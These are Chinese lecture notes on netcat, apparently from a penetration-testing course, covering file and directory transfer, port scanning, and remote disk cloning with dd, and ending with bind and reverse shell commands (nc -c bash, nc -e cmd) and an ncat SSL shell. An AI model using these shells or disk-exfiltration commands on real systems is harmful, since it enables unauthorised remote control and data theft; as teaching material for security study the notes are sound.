######################苑房宏讲课笔记###############################
#nc作为客户端连接服务器,【-v】显示详情,【-n】不进行dns解析
client:nc -vn IP地址 端口
client:nc -v 域名 端口
#nc传输文本信息(可以用于电子取证,避免破坏现场)
server:nc -l -p 4444 或者 nc -lp 4444
client :nc -nv IP 端口
#传输文件(服务端接收文件)
server: nc -l -p 4444 > tmp.txt
#【-q 1】任务完成1秒后断开连接,免得不知道到底完成还是没有完成
# 也可以不加-q参数
client:nc -nv 192.168.0.107 4444 -q 1 < 1刚刚自定义字典.txt 或者 nc -nv 192.168.0.107 4444 < 1刚刚自定义字典.txt -q 1
#传输文件(客户端接收文件)
server:nc -q 1 -lp 4444 < asd.txt
client:nc -nv 192.168.0.107 4444 > 123.txt
#传输目录(客户端接收)(将目录打包后,当成文件传输)
server:tar -cvf - pentest/ | nc -lp 4444 -q 1
client:nc -nv 192.168.0.106 4444 | tar -xvf -
#传输目录(服务端接收)
server:nc -lp 4444 -q 1|tar -xvf -
client:tar -cvf - pentest/ | nc -q 1 -nv 192.168.0.107 4444
#加密传⽂件(服务端接收)(就是用加密软件加密之后,再传输文件)(这个命令没有做验证)
server:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
client: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
#流媒体服务(未做验证)
server: cat 1.mp4 | nc -lp 333
client: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
#端口扫描
#[-z]扫描模式,[-u]udp模式
nc -nvz 1.1.1.1 1-65535
nc -vnzu 1.1.1.1 1-1024 #udp模式的结果不太靠谱
远程克隆硬盘(未做验证,服务端接收)
• A: nc -lp 333 | dd of=/dev/sda
• B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
• 远程电⼦取证,可以将目标服务器硬盘远程复制,或者内存。
NC远程控制
windows : -L 持久
linux : -k 持久
#正向(客户端控制服务端):
server:nc -lp 4444 -c bash
server:nc.exe -lp 4444 -e cmd
client:nc 192.168.0.107 4444
#反向(服务端控制客户端):
server:nc -lp 4444
client:nc 192.168.0.106 4444 -c bash
client:nc 192.168.0.106 4444 -e c: emp c.exe
• 注:Windows⽤户把bash改成cmd;
NC——NCAT
• Nc缺乏加密和⾝份验证的能⼒
• Ncat包含于nmap⼯具包中
server:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
client:ncat -nv 1.1.1.1 333 --ssl